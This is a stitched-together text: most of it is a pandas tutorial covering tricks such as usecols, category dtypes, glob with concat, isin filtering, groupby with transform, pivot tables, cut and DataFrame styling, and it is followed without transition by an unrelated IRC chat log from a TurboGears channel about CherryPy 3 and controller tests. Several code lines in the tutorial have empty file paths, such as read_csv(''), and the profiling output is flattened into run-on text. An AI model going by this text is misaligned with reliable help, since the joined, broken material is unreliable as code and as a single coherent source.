<albertov> brb [09:01] <chrismiles> albertov: good idea [09:02] *** alakdan quit ("its time to get L.... errr Paid") [09:02] <fu_man_chu> ok I'm awake now, reading backchat [09:03] <albertov> fu_man_chu: Hi Robert! [09:03] <fu_man_chu> howdy! [09:03] <albertov> fu_man_chu: I think mark was referring to [09:03] <fu_man_chu> ah :) that's better [09:04] <albertov> fu_man_chu: I expected /tree2/ and /tree2/sub to behave the same as / and /sub but they're not... [09:04] <mramm> Oops. Sorry about the link mixup. [09:05] * fu_man_chu looks at paste.urlmap a bit [09:06] <fu_man_chu> ok, but I'm confused--cherrypy.Tree is basically paste.urlmap, so why use both? pick one or the other [09:07] <albertov> fu_man_chu: mounting the apps with cp._cptree.Application (setting script_name to None) works fine however (I remember some talk about this at... cp ticket #56 i believe) [09:08] <fu_man_chu> right, by setting script_name to None, it should pick up the script_name from the WSGI environ [09:08] <albertov> fu_man_chu: #56'?? where's my brain today.... ;) #638 is [09:09] *** timphnode (n=tim@69.155.106.201) joined [09:09] <albertov> fu_man_chu: but, why doesn't Tree behave similarily? [09:13] <fu_man_chu> I think it's because cherrypy.Tree uses environ.get('SCRIPT_NAME', '') + environ.get('PATH_INFO', '') to match a key in its "apps" dict [09:13] *** hatul30 (i=ariel@gateway/tor/x-61e764dd4b51c063) joined [09:14] <albertov> fu_man_chu: why not just PATH_INFO? (I'm sure I'm missing something somewhere...) [09:15] <fu_man_chu> phone [09:19] <albertov> fu_man_chu: just read "...cherrypy.Tree is basically paste.urlmap, so why use both?..." (\me irc noob): Me might just go with URLMap + Application, however, maybe using Tree would be more familiar to 1.0 users since tree is also used there... anyway, it's not much of a problem either... just curious.... [09:24] *** timphnode_ quit (Read error: 110 (Connection timed out)) [09:28] <fu_man_chu> URLMap + Application should be fine [09:29] <albertov> ok [09:30] <fu_man_chu> cherrypy.Tree doesn't really allow for n-level dispatch graphs--it assumes you're only dispatching on URL once [09:31] <albertov> i see... [09:31] <fu_man_chu> that could be fixed in a future version, but it would be a serious compatibility issue [09:31] <fu_man_chu> good thing there are alternatives :) [09:35] <mramm> Well, I gotta go handle a couple of things offline. Be back in a few. [09:36] <mramm> BTW, Thanks Robert. [09:36] <fu_man_chu> np [09:38] <albertov> fu_man_chu: See if I got this right... the dict at ["/"] that an Application receives propagates to all subpaths, right? is there any other key where config is merged from? [09:38] *** tazzzzz (n=tazzzzz@c-68-40-243-29.hsd1.mi.comcast.net) joined [09:38] *** tazzzzz quit (Client Quit) [09:38] <fu_man_chu> well, cherrypy.request.config = global config + App config [09:39] <fu_man_chu> (all flattened down into a single 1-level dict of entries appropriate for the current PATH_INFO) [09:40] <fu_man_chu> and don't forget cp_config attached to handlers and controllers [09:42] <albertov> fu_man_chu: hmmm, and what happens with config updates to cherrypy.config (not the dict passed to Application), do they get merged somehow into every app's [09:42] <albertov> ? [09:43] <fu_man_chu> global config doesn't get merged into the actual app.config, but each request.config collects from both global and app config [09:44] <fu_man_chu> see [09:44] <albertov> fu_man_chu: cool, then I think using paste.config is probabbly being overkill and we can do with just cherrypy.config (which will be simpler and less error-prone I believe...). I was worried because TG (and TG apps) do lots of config read/writes at import time... [09:45] <fu_man_chu> simple is nice :) [09:45] <fu_man_chu> ?? at *import* time? that seems...too early [09:45] <albertov> albertov: ... we should probably be changing that now that we're aiming for various apps to cohabitate the same process, but I'ts nice to have a fallback for legacy code.... [09:46] <albertov> alberov: yea, I know... but we're too used to single apps per process... :) see, start-myapp.py *first* updates config, then imports Root... [09:47] <nbm> albertov: Can I make identity store identity and so forth in environ instead of on the request? [09:48] <albertov> alberov: ideally all config should be passed as a parameter to the app_factory and be read from there... but it'll be tricky since config is being read even inside the "expose" entangler... [09:48] <albertov> albertov: we're talking about 1.1 right? [09:48] <albertov> cool, I'm talking to myself.... :) I meant nbm [09:49] <fu_man_chu> albertov, you don't have to start every IRC message with your own name :) [09:49] <albertov> \me can't hide his IRC newbieness... ;) [09:49] <fu_man_chu> is start-myapp.py auto-generated (and if so, where)? [09:49] <nbm> albertov: Yeah - I noticed identity wasn't working. Choice between a Tool and Middleware. And since we're looking at Authkit later anyway... [09:50] <albertov> yep, and installed at /usr/bin... that should change to use paster + the app factory... will be much simpler [09:51] <albertov> nbm: I would use AuthKit for authentication and simplify identity to just handle authorization, identity could remain as a filter/tool or ported to middleware... whatever however wants to port it decides... :) [09:53] <fu_man_chu> or both [10:01] <chrismiles> is correct way to set a response header in a controller method still: cherrypy.response.headers["Content-Type"] = "text/html" ? (in 1.1) [10:03] <albertov> fu_man_chu: regarding the config issue... now I remember why I used paste.config: since tg apps update turbogears.config at import time with, for example, tool.staticdirs (the widgets) I wanted the push/pop'ing that paste.config.DispatchingConfig has so the app factory can: 1) push the app's config dict, 2) import the RootController (lot's of config updates at import time going on..), 3) pop the config dict 4) goto 1 until all apps are initialize [10:03] <albertov> d. Is there anyway to do something similar with just cherrypy? or maybe another way to deal with the problem? [10:04] <albertov> chrismiles: yes, I think so... [10:05] <albertov> fu_man_chu: the ultimate solution would be to avoid all this config stuff going on at import time but there should be a way to support 1.0 apps.... [10:05] <chrismiles> albertov: ok thanks. I think I was getting confused about how much the cherrypy package should be abstracted away from TG. [10:07] <albertov> chrismiles: good point.... maybe it would be a good idea to alias the cp equivalents into turbogears.request and turbogears.response in a similar way we do with config? [10:08] <mramm> If there's a long term advantage to the switch I'd support it. But I don [10:08] <mramm> But I don't see any particular advantages to abstracting away request and response [10:08] <albertov> chrismiles: we're using cherrypy for almost everything except the server initialization and some of the engine's functionallity (signal handling, process reloading and the deadlock timer). These are now handled by paster [10:08] <mramm> and it's easy if people know where these things are comming from, and can look at the CP docs to see how they work. [10:09] <albertov> mramm: good point. Then lets better avoid extra indirection... [10:09] <chrismiles> yep, fair points. [10:13] <fu_man_chu> from CP's point of view, as long as cherrypy.config and each app.config have the desired values at request.dispatch time, the rest doesn't matter--you can do whatever contortions you like ;) [10:14] <mramm> Yea. [10:18] <fu_man_chu> if I were doing it, I'd try to have turbogears.config pass everything to app.config except known global namespaces (like server.* and engine.*), and I'd even emit a DeprecationWarning for those if they're not in a [global] section [10:19] <albertov> fu_man_chu: I think that point is already address (providing sane values at cherrypy.request.config *for* cherrypy) since the config is merged into the application just before handling it to the server. I'm more worried with accesses to config from user's code during a request since turbogears.config will give them the config that was passed in the "/" key when it was merged, not the folding that set_conf does into cp.req.config...) [10:20] <nbm> hrm, I'm setting cherrypy.request.identity in a middleware, and I can't access it in the actual app [10:20] <fu_man_chu> if you want to support 1.0 apps, you should be able to construct a singleton DefaultApp which turbogears.config assumes [10:21] *** gasofred_ (n=chatzill@61-224-78-157.dynamic.hinet.net) joined [10:21] <mramm> we could tell people to grab the config off of the request... and for backwards compatability do the wht robert just suggested (only when started from start-myap.py not from tg-admin serve...) [10:22] <albertov> nbm: that's normal, cherrypy.request does not exist above the TG app... you should either stack that middlware below the TG app or pass it in environ [10:22] <nbm> Phew. [10:22] <nbm> I thought I was going mad. [10:22] <fu_man_chu> heh [10:23] <fu_man_chu> mramm, I think alberto is talking about code which needs config values outside of an actual request [10:23] <nbm> Do we keep the environ around accessible from a request? [10:24] <albertov> nbm: cp.request.wsgi_environ [10:24] <nbm> Ta. [10:25] <mramm> hmm, I thought he was looking for access to config durring a request... [10:25] <fu_man_chu> yeah, I'm confused now :) [10:26] <fu_man_chu> CP 3 is designed as Mark suggested: if you need config entries at request time, always get them from request.config [10:26] <albertov> fu_man_chu, mramm: I'm worried about the discrepancy between accesses to tg.config anf cp.req.config during a request... [10:26] <mramm> Yea [10:26] <mramm> I think we should issue deprication warnings for tg.config [10:26] <fu_man_chu> def tg.config.get(key): if in_request: return request.config[key] [10:27] <mramm> and do what robert just suggested. ;) [10:27] <albertov> ... and with a way to support 1.0 apps which access config outside a request so they don't contaminate each other.... otoh, maybe we shouldn't even support multiple 1.0 apps per process... [10:27] <fu_man_chu> I don't see how you *could* support multiple 1.0 apps per process [10:28] <mramm> Yea, if you want multiple 1.0 apps, you have to move to tg-admin serve and use the new config system. [10:28] <mramm> At least that's what seems reasonable to me. [10:29] <albertov> fu_man_chu: i was thinking by proxying those globals to objects bound to each app having some middleware setting up the context before each request (a la StackedObjectProxy) [10:30] <fu_man_chu> why do all that when you already have request.app sitting there on each request? [10:30] <fu_man_chu> request.app is the context [10:31] *** gasofred quit (Read error: 110 (Connection timed out)) [10:31] <albertov> fu_man_chu: hmmm, interesting... wasn't aware of that.... [10:32] <gasofred_> the process is "tg-admin serve -> paste entry point -> call WSGIApp -> load configs -> running", right? [10:32] <fu_man_chu> user code can, if it needs to, access request.app.config[section][key] if it needs to be aware of the whole app config [10:32] <fu_man_chu> including ['/'][key] [10:32] <fu_man_chu> which is where most app-wide config should go [10:33] <albertov> so, the CP way of doing it would be: bind every "former" global to app and, for backwards compat, put a proxy where that service used to be? (eg: turbogears.scheduler -> cp.req.app.scheduler) [10:33] <fu_man_chu> yup [10:33] <albertov> gasofred: more or less: s/call WSGIApp/initialize WSGIApp/ [10:34] <fu_man_chu> and think about what to do if a user calls e.g. turbogears.scheduler outside of a request [10:34] <fu_man_chu> that's case by case [10:35] <albertov> fu_man_chu: hmmm, now I need to digest all this... (hope the irc logger is up and running... ;) [10:35] <fu_man_chu> it isn't :( [10:36] <albertov> really? [10:36] <fu_man_chu> splee must have gone on vacation again >;) [10:37] <albertov> :S and I can't find x-chat-aqua's "save chat"
http://cherrypy.org/wiki/TGIRC20070526
crawl-001
refinedweb
2,464
66.54
How To Build a Universal Feed Reader We will detail the steps in building a feed reader recognizing all formats, by using the possibilities of XML PHP 5. The knowledge of the structure of an RSS file is essential for this study. Structure of an RSS file Any syndication file contains a list of items, articles, notes or other documents, and a description of the site which is the source that is known as the channel. For the channel as well as the elements, we shall provide a title and description, as well as a URL. Articles or documents In all formats, basic data are included: the link on the article, its title, and a summary. <item> <title>RSS Tutorials</title> <link></link> <description>Tutorials for building and using RSS feeds</description> </item> The name of tags are different depending on the format used. Other data can be provided as the author, a logo, etc. The channel, or website providing contents The feed includes a description of the source, thus the site where the documents were published. Its URL, the title of the home page, a description of the site. <channel> <title></title> <link></link> <description></description> <channel> Here again, the name of tags depends on the format used. The items of articles are placed after the description of the channel, as seen in the various formats below. Differences between formats An overall difference between RSS 2.0 and Atom is that the uses the rss container, and Atom, and only the channel. Other differences are the names of tags. Regarding RSS 1.0, which is based on RDF, the syntax is far from those of the two other formats. Format RSS 2.0 The example is based on that of the specification of the RSS 2.0 standard from Harvard. <?xml version="1.0"?> <rss version="2.0"> <channel> <title>Xul News</title> <link></link> <description>Réaliser un lecteur de flux.</description> <language>fr-FR</language> <pubDate>Tue, 10 Jun 2003 04:00:00 GMT</pubDate> <item> <title>Tutoriel</title> <link></link> <description></description> <pubDate>Jeu, 28 Sep 2007 09:39:21 GMT</pubDate> </item> </channel> </rss> Format RSS 1.0 based upon RDF The format 1.0 uses the same tag names that the 2.0 which will facilitate the construction of a universal reader. However, there are differences in structures. Firstly, the container rdf belongs to a namespace of the same name. The structure is defined in the channel tag, but the descriptive elements are added after it. The example below is based on the specification of the standard RSS 1.0. <?xml version="1.0"?> <rdf:RDF xmlns: <channel rdf: <title>scriptol.com</title> <link></link> <description> </description> <image rdf: <items> <rdf:Seq> <rdf:li ...autres articles... </rdf:Seq> </items> </channel> <image rdf: <title>scriptol.com</title> <link></link> <url></url> </image> <item rdf: <title>RSS</title> <link></link> <description> </description> </item>...autres items... </rdf:RDF> Even though the format is more complex, using it remains simple with the XML and DOM functions of PHP. Structure of the Atom format The Atom format uses directly the channel as root container. The tag of the channel is feed and elements are entry. <?xml version="1.0" encoding="utf-8"?> <feed xmlns=""> <title>Feed sample</title> <link href=""/> <updated></updated> <author> <name>Denis Sureau</name> </author> <entry> <title>Building a feed reader</title> <link href=""/> <updated></updated> <summary>Une description.</summary> </entry> </feed> As one sees Atom uses its own tag names while the two RSS format share same ones. What we harness to identify the format of a feed file. Using DOM with PHP 5 The Document Object Model can extract tags in an XML document or HTML. We will use the getElementsByTagName function for a list of tags whose name is given as a parameter. This function returns a list in DOMNodeList format, which contains elements format DOMNode. It applies to the whole document, or a DOMNode element and thus extract parts of the file, the channel or an item, and in this part a list of tags. Extracting the RSS channel DOMDocument $doc = new DOMDocument("1.0"); DOMNodeList $channel = $doc->getElementsByTagName("channel"); We will use the parameter "feed" for the channel. Note that the class names are for informational purposes, the PHP code does not use them. Extracting the first element DOMElement $element = $channel.item(0); You can assign a DOMElement rather that a DOMNode directly at the call of the item() method which returns an DOMNode. The advantage is that DOMElement has attributes and methods to access the contents of the element. Extracting all elements for($i = 0; $i < $channel->length; i++) { $element = $channel->item(i); } Using data element For each item, as the canal, components are extracted with the same method and with the firstChild attribute. For example, the title: $title = $element.getElementsByTagName("title"); // getting the list of title tags $title = $title->item(0); // getting one tag $title = $title->firstChild->textContent; // getting its content Wihtout a method for extracting a single element, getElementsByTagName is used to extract a list that actually contain one element, and by using item, we get this element. In XML, the content of a tag is treated as a child node, so we use the property firstChild to get the content of an XML element, and data for the text content. It remains to apply these methods on the channel and on each element of the feed to retrieve its contents. For a more general use, the function returns the contents implemented in a two-dimensional table. It will then be the choice of the programmer to display directly it in a Web page, or perform some treatment on the table. How to identify the format Identifying the format is very simple if we know that RSS 1.0 and 2.0 use the same tags, and therefore that the same functions could apply to both formats. We recognize Atom by the feed container, while RSS 2.0 uses channel and 1.0 uses rdf. Because both RSS versions use the channel tag, the feed tag is enough to recognize Atom. DOMDocument $doc = new DOMDocument("1.0"); DOMNodeList $channel = $doc->getElementsByTagName("feed"); $isAtom = ($channel != false); We do try to extract the feed tag. If the interpreter finds this tag, the DOMNodeList will contain an element. The isAtom flag is set to true, otherwise we will treat the feed as RSS format without distinction. Reading data channel We know how to extract the channel. The same function can be used with the string "feed" or "channel" as parameter. It is assumed that the pointer to the document is the global variable $doc. function extractChannel($chan) { DOMNodeList $channel = $doc->getElementsByTagName($chan); return $channel->item(0); } We can then with the following function, called with the name of each tag in parameter, read the title and the description of the channel. function getTag($tag) { $content = $channel->getElementsByTagName($tag); $content = $content->item(0); return($content->firstChild->textContent); } We then call the function with successively as parameter "title", "link", "description"... The names depend on the format, it will be "summary" for Atom and "description" for the others. Reading data elements The principle will be the same, but we will have to loop in a list of items while there is only one channel. We must also take into account the fact that RSS 1.0 put descriptions of the elements out of the channel tag while they are contained inside in other formats. The items are contained in feed in Atom in channel in RSS 2.0, but in rdf: RDF in RSS 1.0. The function extractItems extract the list of elements, it has the parameter "item" in RSS and "entry" in Atom: function extractItems($tag) { DOMNodeList $dnl = $doc->getElementsByTagName($tag); return $dnl; } The returned list is used to access each item. He is pushed into the array $a. Example with the RSS format. $a = array(); $items = extractItems("item"); for($i = 0; $i < $items->length; i++) { array_push($a, $items->item($i)); } One can also directly create an array of tag of an item: title, link, description for each item and place it in a two-dimensional table. To do this, we do use a generic version of the getTag function defined earlier: function getTag($item, $tag) { $content = $item->getElementsByTagName($tag); $content = $content->item(0); return($content->firstChild->textContent); } for($i = 0; $i < $items->length; i++) { $a = array(); $item = $items->item($i); array_push($a, getTag($item, "title")); ... and so on for each tag of the item... array_push($FeedArray, $a); } We placed each article in a two-dimensional table that can be simply displayed or used as we want. The loop will be put in the getTags function. Functions of the full reader We now have a list of all functions useful for the universal reader. ExtractChannel extracts the tag of the channel into an object. ExtractItems extracts items of the document as an object. GetTag Reads data from a tag. GetTags Place the contents of an element (article or channel) in an array. With the appropriate parameters, these functions are used for all formats. Universal_Reader Englobes the entire process for a given feed, the format being unspecified. Universal_Display Customizable functin to display a feed into an HTML page. In the most basic case, the feed is intended to be integrated into a Web page, either before its loading or further at user request. Whatever the format is, especially for feeds in languages with accents, care must be taken to the compatibility of the encoding format, which is most often UTF-8 for the feed and sometimes ISO-8159 or windows-1252 for the page where it will appear. It is better to give the UTF-8 format to the page to avoid a bad display of accented characters. The encoding is given by the content-type meta with a line in the following format: <meta http- To see a page that includes a feed, insert the following code in the HTML code: <?php include("universal-reader.php"); Universal_Reader(""); echo Universal_Display(); ?> See the demonstration given below. This case arises when the visitor chooses a feed in a list or enters the name of the feed. The loading can be done with Ajax for an asynchronous display or only in PHP by displaying the whole page again. We will use a form with an input text field to give the URL of the feed or a single link (or a choice of links) on which one click to see a feed. Demonstration - Universal RSS reader demos. Include the reader and two demos. More - Which feed format to choose? - Common Reader. API to build a universal reader. Forum Problem with atom links in the universal feed reader. Atom links do not work sportbilly scriptol sportbilly scriptol <?php $url=""; $hnd=curl_init(); curl_setopt($hnd,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($hnd,CURLOPT_URL,$url); $page=curl_exec($hnd); curl_close($hnd); $doc=new DOMDocument(); $doc->loadXML($page); echo $doc->saveXML(); ?>The feed is loaded. I have to look further in the code, maybe replace this code: $doc = new DOMDocument(); $doc->load($url);by the curl code above to make it working. sportbilly scriptol sportbilly scriptol $Universal_FeedArray = array(); $hnd=curl_init(); curl_setopt($hnd,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($hnd,CURLOPT_URL,$url); $page=curl_exec($hnd); curl_close($hnd); $Universal_Doc=new DOMDocument(); $Universal_Doc->loadXML($page);The feed is loaded, but not properly formatted. I do not know if PHP is able to parse a such file. If you can display other feed and not this one, the answer is no. sportbilly scriptol sportbilly
https://www.scriptol.com/rss/universal-feed-reader.php
CC-MAIN-2020-16
refinedweb
1,921
56.25
NAME _exit, _Exit - terminate the calling process SYNOPSIS #include <unistd.h> void _exit(int status); #include <stdlib.h> void _Exit(int status); Feature Test Macro Requirements for glibc (see feature_test_macros(7)): _Exit(): _XOPEN_SOURCE >= 600 || _ISOC99_SOURCE; or cc -std=c99(2)(3), but does not call any functions registered with atexit(3) or on_exit(3).. SEE ALSO execve(2), exit_group(2), fork(2), kill(2), wait(2), wait4(2), waitpid(2), atexit(3), exit(3), on_exit(3), termios(3) COLOPHON This page is part of release 3.01 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
http://manpages.ubuntu.com/manpages/intrepid/man2/_exit.2.html
CC-MAIN-2015-18
refinedweb
107
57.27
On Thu, 2006-11-02 at 10:51 -0500, Tom Lane wrote: > "Simon Riggs" <[EMAIL PROTECTED]> writes: > > We have namespaces to differentiate between two sources of object names, > > so anybody who creates a schema where MyColumn is not the same thing as > > myColumn is not following sensible rules for conceptual distance. > > I'd agree that that is not a good design practice, but the fact remains > that they *are* different per spec. > > > Would be better to make this behaviour a userset > > switchable between the exactly compliant and the more intuitive. > > That's certainly not happening --- if you make any changes in the > semantics of equality of type name, it would have to be frozen no > later than initdb time, for exactly the same reasons we freeze > locale then (hint: index ordering). Advertising [Re-read all of this after Bruce's post got me thinking.] My summary of the thread, with TODO items noted: 1. PostgreSQL doesn't follow the spec, but almost does, with regard to comparison of unquoted and quoted identifiers. DB2 does this per spec. 2. TODO: We could follow the spec, but it would need an initdb option; some non-SQL:2003 standard PostgreSQL programs would not work as they do now. This is considered a minor, low priority item, though. 3. TODO: We could set column headers better if we wanted to (rather than ?column? we could use e.g. Sum_ColumnName etc) -- Simon Riggs EnterpriseDB ---------------------------(end of broadcast)--------------------------- TIP 3: Have you checked our extensive FAQ?
https://www.mail-archive.com/pgsql-hackers@postgresql.org/msg84985.html
CC-MAIN-2018-17
refinedweb
250
61.26
Are you sure? This action might not be possible to undo. Are you sure you want to continue? ) as well as strings and booleans. There are many reasons to “label” data with types: • To reduce programming mistakes • Make internal computations easier • To make our programs clearer The two data types that we use in this class to describe numbers are int and double. Int stands for integer Double numbers are decimal numbers Variable in C++ means something else than a variable in mathematics. In mathematics variables are most often something whose value is unknown and we are trying to solve. In C++ variable is an object that is storing a value. To create a variable we must know what its data type is. int x=2; The above line creates a variable called x which stores data of type integer. Note that the variable is on the left and the value being assigned to the variable is on the right. In many ways a variable behaves exactly like the data it is storing: int x=2; cout << x; // outputs 2 Notice how there are no quotes around the variable! How about cout << x+7; The computer will recognize x+7 as an artihmetic expression and evaluate it to 9. Notice that we are not changing the value of x here! #include <iostream> using namespace std; int main() { int pennies = 8; int dimes = 4; int quarters = 3; double total = pennies * 0.01 + dimes * 0.10 + quarters * 0.25; cout << “Total value of the coins is: ” << total << “\n”; return 0; } Integers are faster to process than doubles. This may be significant factor in very large programs. Variable names should be descriptive! // bad! Usually start variables names with lower-case letter. Or to explain a single line of code . int main () { int MyNumber . type_name variable_name.g. … . double gravity = 9. double height=3. // slightly better area_triangle = 17. **STATEMENTS** return 0. variable_name2. PI) Variable names are case sensitive If you declare a variable double perimeter. go back to the beginning and declare them. Declare variables right away Standard to declare all variables first.7. In some cases people will declare a variable in the middle of a code.a=17. Generally capitalize class names. Variable names must start with a letter or an underscore _ and the remaining characters must be letters numbers or underscores. //good!! Variable names should be short Do not do: area_of_a_triangle = 17. … .8. 2 ways to comment on your code: For a single line comment // This is a comment Use it either on a line of its own: //Variables used to define the dimensions of a rectangle double width=2. Do not start using Perimeter in your code. // or type_name variable_name=value. // bad variable name areatriangle = 17. } As you need variables in your program. // or type_name variable_name1. You cannot use a reserved word for your variable name like main or cout. (e. // or type_name variable_name1=value1. Mostly when the variable is to be used only once at that exact spot for some relatively unimportant purpose.0. variable_name2=value2. Write constants in all caps. You will get an error. ) Note that our “arrows” >> are pointing into the page because we are pulling data in.More on that later in quarter. How do we get input? Use cin! int number. cout << “The perimeter of the rectangle is: “ << 2* side1 + 2*side2.”.6.5. Asterix make your comment stand out Why use comments? • Comments are ignored by the computer • They are for your benefit! • Comments make coding easier and code more readable • Other people can read your code and understand it • Useful for debugging! We already know how to print stuff to the console double side1 = 5. /* This is another comment method. cin >> dimes. cout << “Your number is: “ << number. When the computer encounters a cin command it first checks to see if anything is in the buffer. double side1. and a very brief description. cout << “Please give me lengths of two sides of a rectangle. int quarters. double side2 = 4. // If a user enters two numbers here say 15 20 cout << “Please enter number of quarters.cout << Total.. cin >> side1 >> side2.”. If there is something in the buffer the input for the variable is read from the buffer instead of the console! int dimes. cin means that we are getting data from the console. (We could get data from other places too. Buffer is like a temporary storage place.\n”. . cout << “The Area of the rectangle is: “ << side1 * side2<< “\n”. Good business practice. // cin can also be chained cout << “The area is: “ << side1 * side2. Use this method when you want to make longer comments that span many lines */ The top of every source file should contain your name. When too many values are entered by the user they get placed into a buffer. cout << “Please enter number of dimes. cin >> number. side2.. the date. // Here we output the total cost. We will learn how to do this later. // User does not get a chance to input a value // Instead quarters gets a value 20 When cin tries to read incompatible data to a variable. cin goes into a fail state.cin >> quarters. All subsequent cin commands will be ignored!! There is a way to recover from this error. . Checking input for validity is important. Users always find a way to do something incorrect. For now we will assume that the user always enters correct data. This means that cin has lost confidence in the data in the buffer. We will learn later how.
https://www.scribd.com/document/187906599/Pic-10-Lecture-2
CC-MAIN-2017-43
refinedweb
919
77.23
Mach-O, short for Mach object file format, is a file format for executables, object code, shared libraries, dynamically-loaded code, and core dumps. A derivation of the a.out format, Mach-O offered more extensibility and faster access to information in the symbol table. Mach-O was once used by most systems based on the Mach kernel. NeXTSTEP, Darwin and Mac OS X are examples of systems that have used this format for native executables, libraries and object code. GNU Hurd, which uses GNU Mach as its microkernel, uses ELF, and not Mach-O, as its standard binary format. Each Mach-O file is made up of one Mach-O header, followed by a series of load commands, followed by one or more segments, each of which contains between 0 and 255 sections. Mach-O uses the REL relocation format to handle references to symbols. When looking up symbols Mach-O uses a two-level namespace that encodes each symbol into an 'object/symbol name' pair that is then linearly searched for by first the object and then the symbol name. The basic structure—a list of variable-length "load commands" that reference pages of data elsewhere in the file—was also used in the executable file format for Accent. The Accent file format was in turn, based on an idea from Spice Lisp. Multiple Mach-O files can be combined in a multi-architecture binary; this allows a single binary file to contain code to support multiple instruction set architectures. For example, a multi-architecture binary for Mac OS X could contain both 32-bit and 64-bit PowerPC code, or could contain both 32-bit PowerPC or x86 code, or could contain 32-bit PowerPC code, 64-bit PowerPC code, 32-bit x86 code, and 64-bit x86 (x86-64) code. stock | retire | vm Why are we here? All text is available under the terms of the GNU Free Documentation License This page is cache of Wikipedia. History
http://wiki.xiaoyaozi.com/en/Mach-O.htm
crawl-002
refinedweb
331
59.33
Lets say i have a file with 20 lines... How do i read just line 14 or any other line i want alone with out reading the rest? Lets say i have a file with 20 lines... How do i read just line 14 or any other line i want alone with out reading the rest? You read one line at a time. Use a counter if you want a specific number of lines to read. Your question seems quite vague because the answer is too simple. How are you reading from the file? if you know the length you can use i would jsut read in one line at a time, possibly store each string into a vector just incase im going to end up using all the lines, and simply call the spot in the vector for the line i wanted ex then again im kind of parcial to vectors, hense the name :/then again im kind of parcial to vectors, hense the name :/Code:vector<string> vS; string S; ifstream file("myfile.txt"); while(!file.fail()) { getline(file, S, '\n'); vS.push_back(S); } file.close(); cout << vS[13] << endl; //for line 14 of the file of course these will require : Code:#include <iostream> #include <fstream> #include <string> #include <vector> using namespace std; Last edited by ILoveVectors; 06-24-2005 at 11:41 AM. Your example code will add an extra entry to the vector you don't want. Use while (getline(file, S, '\n')) instead. lets say i have teh number 123 stored in a string is there a way to put into int? If you mean actual string and not character array, if you do mean character array look in the faq, its there somewhere to.
https://cboard.cprogramming.com/cplusplus-programming/66898-i-o-question.html
CC-MAIN-2017-04
refinedweb
290
86.84
#include <sal/types.h> #include <rtl/ustring.hxx> #include "SwGetPoolIdFromName.hxx" #include "swdllapi.h" #include <unordered_map> #include <vector> Go to the source code of this file. This class holds all data about the names of styles used in the user interface (UI names...these are localised into different languages). These UI names are loaded from the resource files on demand. It also holds all information about the 'Programmatic' names of styles which remain static (and are hardcoded in the corresponding cxx file) for all languages. This class also provides static functions which can be used for the following conversions: The relationship of these tables to the style families is as follows: Therefore, when there is a danger of a nameclash, the boolean bDisambiguate must be set to true in the SwStyleNameMapper call (it defaults to false). This will cause the following to happen: If the UI style name either equals a programmatic name or already ends with " (user)", then it must append " (user)" to the end. When a programmatic name is being converted to a UI name, if it ends in " (user)", we simply remove it. Definition at line 74 of file SwStyleNameMapper.hxx.
https://docs.libreoffice.org/sw/html/SwStyleNameMapper_8hxx.html
CC-MAIN-2020-50
refinedweb
194
64.2
Net 2008. .NET developer ...on classic windows based DESKTOP Windows server was compromised due to due to SynAck ransomware attack We need to Decrypt a MS SQL Server 2008 database .mdf & .ldf file (2files) ...Class5softswitch which we would host on our own server network running either Linux or Win 2008. ...technologies that require lower labour, [log ind for at se URL], Entity Framework, Java Script, jQuery, AJAX, HTML5, XML, JSON, CSS3, Bootstrap3 CSS experience in MVC .Net, Visual Studio, ASP.Net 4.0 with C#, SQL Server 2008, HTML 5, JQUERY Mobile framework, WCF. latest website developed is vyankatesh software solutions. required 1 month to complete skills used are . net , visual studeo 2010 and sql server 2008 s...error: "The type or namespace name 'WS' does not exist in the namespace 'xxx' (are you missing an assembly reference?)" I am looking someone, who works with Dynamics NAV and .NET. Some documents were corrupted and need erasing from Database I need a simple console program in .net core that invokes OpenOffice autonomously and convert an .xlsx file to .pdf. Exemple: ... ...hospital management system, iphone gps system tracking contacts, source code hospital management system, source code online examination system, source code shopping cart system 2008, free source code leave management system aspnetc, vb6 source code college management system, free vbnet source code hospital manage system, source code information management
https://www.dk.freelancer.com/job-search/net-2008/
CC-MAIN-2018-51
refinedweb
227
64.81
Awesome Django authorization, without the database Project description rules is a tiny but powerful app providing object-level permissions to Django, without requiring a database. At its core, it is a generic framework for building rule-based systems, similar to decision trees. It can also be used as a standalone library in other contexts and frameworks. Features rules has got you covered. rules is: - Documented, tested, reliable and easy to use. - Versatile. Decorate callables to build complex graphs of predicates. Predicates can be any type of callable – simple functions, lambdas, methods, callable class objects, partial functions, decorated functions, anything really. - A good Django citizen. Seamless integration with Django views, templates and the Admin for testing for object-level permissions. - Efficient and smart. No need to mess around with a database to figure out whether John really wrote that book. - Simple. Dive in the code. You’ll need 10 minutes to figure out how it works. - Powerful. rules comes complete with advanced features, such as invocation context and storage for arbitrary data, skipping evaluation of predicates under specific conditions, logging of evaluated predicates and more! Table of Contents - Requirements - Upgrading from 2.x - Upgrading from 1.x - How to install - Using Rules - Using Rules with Django - Advanced features - Best practices - API Reference - Licence Requirements rules requires Python 3.7 or newer. The last version to support Python 2.7 is rules 2.2. It can optionally integrate with Django, in which case requires Django 2.2 or newer. Note: At any given moment in time, rules will maintain support for all currently supported Django versions, while dropping support for those versions that reached end-of-life in minor releases. See the Supported Versions section on Django Project website for the current state and timeline. Upgrading from 2.x The are no significant changes between rules 2.x and 3.x except dropping support for Python 2, so before upgrading to 3.x you just need to make sure you’re running a supported Python 3 version. Upgrading from 1.x - Support for Python 2.6 and 3.3, and Django versions before 1.11 has been dropped. - The SkipPredicate exception and skip() method of Predicate, that were used to signify that a predicate should be skipped, have been removed. You may return None from your predicate to achieve this. - The APIs to replace a rule’s predicate have been renamed and their behaviour changed. replace_rule and replace_perm functions and replace_rule method of RuleSet have been renamed to set_rule, set_perm and RuleSet.set_perm respectively. The old behaviour was to raise a KeyError if a rule by the given name did not exist. Since version 2.0 this has changed and you can safely use set_* to set a rule’s predicate without having to ensure the rule exists first. How to install Using pip: $ pip install rules Manually: $ git clone $ cd django-rules $ python setup.py install Run tests with: $ ./runtests.sh You may also want to read Best practices for general advice on how to use rules. Configuring Django Add rules to INSTALLED_APPS: INSTALLED_APPS = ( # ... 'rules', ) Add the authentication backend: AUTHENTICATION_BACKENDS = ( 'rules.permissions.ObjectPermissionBackend', 'django.contrib.auth.backends.ModelBackend', ) Using Rules rules is based on the idea that you maintain a dict-like object that maps string keys used as identifiers of some kind, to callables, called predicates. This dict-like object is actually an instance of RuleSet and the predicates are instances of Predicate. Creating predicates Let’s ignore rule sets for a moment and go ahead and define a predicate. The easiest way is with the @predicate decorator: >>> @rules.predicate >>> def is_book_author(user, book): ... return book.author == user ... >>> is_book_author 